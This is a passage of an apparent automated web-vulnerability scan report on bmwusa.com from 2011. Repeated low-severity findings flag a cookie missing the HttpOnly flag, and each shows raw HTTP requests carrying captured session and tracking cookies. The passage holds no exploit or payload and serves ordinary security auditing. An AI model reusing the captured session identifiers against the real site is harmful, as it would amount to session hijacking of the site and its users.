The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/328isedan/3seriessedanmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:48:05 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:08:05 GMT;path=/
Content-Length: 201974

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.184. http://www.bmwusa.com/standard/content/vehicles/2011/3/328isedan/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/328isedan/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:07:45 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/328isedan/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:47:45 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:07:45 GMT;path=/
Content-Length: 214690

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.185. http://www.bmwusa.com/standard/content/vehicles/2011/3/328isedan/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/328isedan/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:08:09 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/328isedan/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:48:09 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:08:09 GMT;path=/
Content-Length: 225674

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.186. http://www.bmwusa.com/standard/content/vehicles/2011/3/328isedan/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/328isedan/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:07:53 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/328isedan/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:47:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:07:53 GMT;path=/
Content-Length: 215545

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.187. http://www.bmwusa.com/standard/content/vehicles/2011/3/328isportswagon/3seriessportswagonmediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/328isportswagon/3seriessportswagonmediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:55:48 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/328isportswagon/3seriessportswagonmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:35:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:55:48 GMT;path=/
Content-Length: 202357

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.188. http://www.bmwusa.com/standard/content/vehicles/2011/3/328isportswagon/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/328isportswagon/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:55:00 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/328isportswagon/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:35:00 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:55:00 GMT;path=/
Content-Length: 213889

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.189. http://www.bmwusa.com/standard/content/vehicles/2011/3/328isportswagon/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/328isportswagon/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:55:59 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/328isportswagon/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:35:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:55:59 GMT;path=/
Content-Length: 226292

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.190. http://www.bmwusa.com/standard/content/vehicles/2011/3/328isportswagon/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/328isportswagon/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:55:11 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/328isportswagon/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:35:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:55:11 GMT;path=/
Content-Length: 216599

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.191. http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivecoupe/3seriescoupemediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/328ixdrivecoupe/3seriescoupemediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:41:39 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/328ixdrivecoupe/3seriescoupemediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:21:39 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:41:39 GMT;path=/
Content-Length: 202376

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.192. http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivecoupe/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/328ixdrivecoupe/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:41:09 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/328ixdrivecoupe/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:21:09 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:41:09 GMT;path=/
Content-Length: 214938

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.193. http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivecoupe/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/328ixdrivecoupe/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:41:47 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/328ixdrivecoupe/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:21:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:41:47 GMT;path=/
Content-Length: 201402

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.194. http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivecoupe/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/328ixdrivecoupe/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:41:33 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/328ixdrivecoupe/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:21:33 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:41:33 GMT;path=/
Content-Length: 216450

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.195. http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivesedan/3seriessedanmediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/328ixdrivesedan/3seriessedanmediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:31:53 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/328ixdrivesedan/3seriessedanmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:11:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:31:53 GMT;path=/
Content-Length: 202375

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.196. http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivesedan/3seriessedanmediagallery.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/328ixdrivesedan/3seriessedanmediagallery.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:09:23 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/328ixdrivesedan/3seriessedanmediagallery.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
